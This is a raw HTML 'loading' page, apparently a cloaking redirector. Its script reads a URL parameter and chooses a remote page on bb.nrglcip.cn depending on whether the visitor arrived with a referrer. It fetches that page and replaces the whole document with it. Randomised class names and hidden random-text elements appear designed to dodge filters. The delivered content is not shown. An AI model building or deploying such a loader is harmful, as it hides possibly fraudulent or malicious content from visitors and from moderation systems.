<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .D01VOXZm {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .D01VOXZm .SF4WUz7 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .D01VOXZm .content {
            line-height: 50px;
            text-align: center
        }

        .D01VOXZm .img {
            width: 100%
        }

        .D01VOXZm .R0f4PUwtc {
            text-align: center
        }

        .D01VOXZm .R0f4PUwtc span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .D01VOXZm .R0f4PUwtc span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .D01VOXZm .R0f4PUwtc span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .D01VOXZm .R0f4PUwtc span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .D01VOXZm .R0f4PUwtc span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .D01VOXZm .R0f4PUwtc span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .D01VOXZm .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function fL14l86X6al9X(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TvD8dRk = fL14l86X6al9X('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TvD8dRk +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TvD8dRk +".html?a=share";
		}
		
        JCUXOw=url+"#"+new Date().getTime();
        JCUXOw && function() {
            $.get(JCUXOw, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >uXcdcO0vGol4wBsqo</ul>
<span style='display:none'>vY6TDZJa9dg8HAo9tljDyGrSOHybRfRcGTGtCPurHFK0XRAjhDttLDkgJRY8kfpJCG0GSaUSqm2eIaSXu</span>
<ul style='display:none' >uXcdcO0vGol4wBsqo</ul>
<p  style='display:none'>KpkzJTJN0GgHyg6ZL8fidOs3kOsUdQyyrCAckALTqIxPR4oVOQV63CQWdL1gXn6zayrJZdWQb5rN</p>
<b style='display:none' >lyQjN1I6HipFvcSzgYMaqUNhtCv4X9cna3xa5AeZqTR7FVybSr77JOvNlkdg1JJTk3YHkwm</b>
<p  style='display:none'>KpkzJTJN0GgHyg6ZL8fidOs3kOsUdQyyrCAckALTqIxPR4oVOQV63CQWdL1gXn6zayrJZdWQb5rN</p>
<ul style='display:none' >uXcdcO0vGol4wBsqo</ul><div class="D01VOXZm">
    <div class="SF4WUz7">
        <div class="R0f4PUwtc">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>wCoD5Yp4INvdVIDtvTXHok7RjfpKRjVYLhA</div>
<b style='display:none' >KZg15vUzVoWxp</b>
<div style='display:none'>wCoD5Yp4INvdVIDtvTXHok7RjfpKRjVYLhA</div>
<a  href='#' style='display:none'>HlnV9NWkIloWxJwE0P04coUKl4qVVxfyMGgxxYpm1qw9ksEZAgdF</a>
<li style='display:none' >EFsBxR1XiW5nSqtxorDWAWzuIOaJBtezke3px2e7irxqF21bGbGOf</li>
<b style='display:none' >KZg15vUzVoWxp</b></body>
</html>